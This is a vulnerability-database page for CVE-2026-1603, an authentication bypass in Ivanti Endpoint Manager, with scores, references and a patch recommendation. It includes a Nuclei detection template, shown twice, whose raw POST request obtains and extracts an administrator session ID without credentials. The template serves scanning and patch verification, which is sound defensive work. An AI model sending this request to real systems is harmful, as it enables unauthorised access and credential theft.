Ivanti Endpoint Manager - Authentication Bypass

CVE-2026-1603

Verified

Description

Ivanti Endpoint Manager < 2024 SU5 contains an authentication bypass caused by improper access control, letting remote unauthenticated attackers leak stored credential data, exploit requires no special privileges.

Severity

High

CVSS Score

8.6

Exploit Probability

59%

Affected Product

endpoint_manager

Published Date

February 13, 2026

Template Author

dhiyaneshdk, watchtowrlabs

CVE-2026-1603.yaml

id: CVE-2026-1603

info:
  name: Ivanti Endpoint Manager - Authentication Bypass
  author: DhiyaneshDk,watchtowrlabs
  severity: high
  description: |
    Ivanti Endpoint Manager < 2024 SU5 contains an authentication bypass caused by improper access control, letting remote unauthenticated attackers leak stored credential data, exploit requires no special privileges.
  impact: |
    Remote attackers can leak stored credential data, potentially compromising sensitive information.
  remediation: |
    Update to version 2024 SU5 or later.
  reference:
    - https://x.com/watchtowrcyber/status/2022305033086235108/photo/1
    - https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1603
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-1603
    cwe-id: CWE-288
    epss-score: 0.58921
    epss-percentile: 0.98244
    cpe: cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ivanti
    product: endpoint_manager
  tags: cve,cve2026,api,auth,ivanti,epmm,authbypass,vkev,kev

http:
  - raw:
      - |
        POST /RemoteControlAuth/api/Auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "logintype":"64",
            "username":"administrator"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"sessionid":'

      - type: word
        part: body
        words:
          - '"sessionid": null'
        negative: true

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: sessionid
        json:
          - '.sessionid'
# digest: 4a0a00473045022100e93693dcd091bfc6ad4ab70c30fc89f6fda1e7c69255cda6e8aab3cc9509f5c502205ee0e7587ec845612a76bf78d10f1ddcd4afa129cc8321db988418d083b4b32e:922c64590222798bb761d5b6d8e72950

8.6Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVE ID:

cve-2026-1603

CWE ID:

cwe-288

References

https://x.com/watchtowrcyber/status/2022305033086235108/photo/1 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 https://nvd.nist.gov/vuln/detail/CVE-2026-1603

Remediation Steps

Update to version 2024 SU5 or later.

id: CVE-2026-1603

info:
  name: Ivanti Endpoint Manager - Authentication Bypass
  author: DhiyaneshDk,watchtowrlabs
  severity: high
  description: |
    Ivanti Endpoint Manager < 2024 SU5 contains an authentication bypass caused by improper access control, letting remote unauthenticated attackers leak stored credential data, exploit requires no special privileges.
  impact: |
    Remote attackers can leak stored credential data, potentially compromising sensitive information.
  remediation: |
    Update to version 2024 SU5 or later.
  reference:
    - https://x.com/watchtowrcyber/status/2022305033086235108/photo/1
    - https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1603
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-1603
    cwe-id: CWE-288
    epss-score: 0.58921
    epss-percentile: 0.98244
    cpe: cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ivanti
    product: endpoint_manager
  tags: cve,cve2026,api,auth,ivanti,epmm,authbypass,vkev,kev

http:
  - raw:
      - |
        POST /RemoteControlAuth/api/Auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "logintype":"64",
            "username":"administrator"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"sessionid":'

      - type: word
        part: body
        words:
          - '"sessionid": null'
        negative: true

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: sessionid
        json:
          - '.sessionid'
# digest: 4a0a00473045022100e93693dcd091bfc6ad4ab70c30fc89f6fda1e7c69255cda6e8aab3cc9509f5c502205ee0e7587ec845612a76bf78d10f1ddcd4afa129cc8321db988418d083b4b32e:922c64590222798bb761d5b6d8e72950

Ivanti Endpoint Manager - Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Ivanti Endpoint Manager - Authentication Bypass

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps